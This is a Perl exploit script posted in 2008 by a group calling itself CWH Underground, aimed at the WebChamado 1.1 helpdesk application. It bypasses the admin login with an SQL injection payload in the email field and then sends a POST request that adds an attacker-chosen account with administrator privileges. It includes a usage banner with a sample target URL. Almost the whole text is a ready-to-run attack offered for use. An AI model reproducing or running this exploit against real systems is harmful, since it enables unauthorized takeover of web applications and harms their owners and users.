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Posted on 13 June 2008

#!/usr/bin/perl #============================================ # WebChamado 1.1 Arbitrary Add Admin Exploit #============================================ # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / ` / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 12 June 2008 #SITE : www.citec.us # # ##################################################### #APPLICATION : WebChamado #VERSION : 1.1 #DOWNLOAD : http://downloads.sourceforge.net/webchamado ###################################################### # #Note: magic_quotes_gpc = off # #This Exploit will Add user to administrator's privilege and you will get password from email.. use LWP; use HTTP::Request; use HTTP::Cookies; if ($#ARGV + 1 != 3) { print " ============================================== "; print " WebChamado 1.1 Arbitrary Add Admin Exploit "; print " "; print " Discovered By CWH Underground "; print "============================================== "; print " "; print " "; print "Usage: ./xpl-webchamado.pl <WebChamado URL> <user> <email> "; print "Ex. ./xpl-webchamado.pl http://www.target.com/WebChamado/ cwhunderground cwh@cwh.com "; exit(); } $cmsurl = $ARGV[0]; $user = $ARGV[1]; $mail = $ARGV[2]; $loginurl = $cmsurl."admin/index.php"; $adduserurl = $cmsurl."admin/corpo.php?menuadmin_responsavel=S&rsp_tipusr=U"; $post_content = "rsp_tipusr=U&rsp_nome=".$user."&rsp_codund=01&rsp_coddep=31&rsp_codfun=46&rsp_eml=".$mail."&rsp_adm=1&rsp_mst=S&rsp_btnresponsavel=Confirmar"; print " ..::Login Page URL::.. "; print "$loginurl "; print " ..::Add User Page URL::.. "; print "$adduserurl "; $ua = LWP::UserAgent->new; $ua->cookie_jar(HTTP::Cookies->new); $request = HTTP::Request->new (POST => $loginurl); $request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); $request->content_type ('application/x-www-form-urlencoded'); $request->content ('eml=') or 1=1/*&pas=masteradm&btn=Enviar'); $response = $ua->request($request); $content = $response->content; if ($content =~ /index_ok/) { print "Login Success !!! "; } else { print "Login Failed !!! "; exit(); } $request = HTTP::Request->new (POST => $adduserurl); $request->content_type ('application/x-www-form-urlencoded'); $request->content ($post_content); $response = $ua->request($request); $content = $response->content; if ($content =~ /$user.*ADM.*$mail/) { print "Exploit Completed !!! "; } else { print "Exploit Failed !!! "; }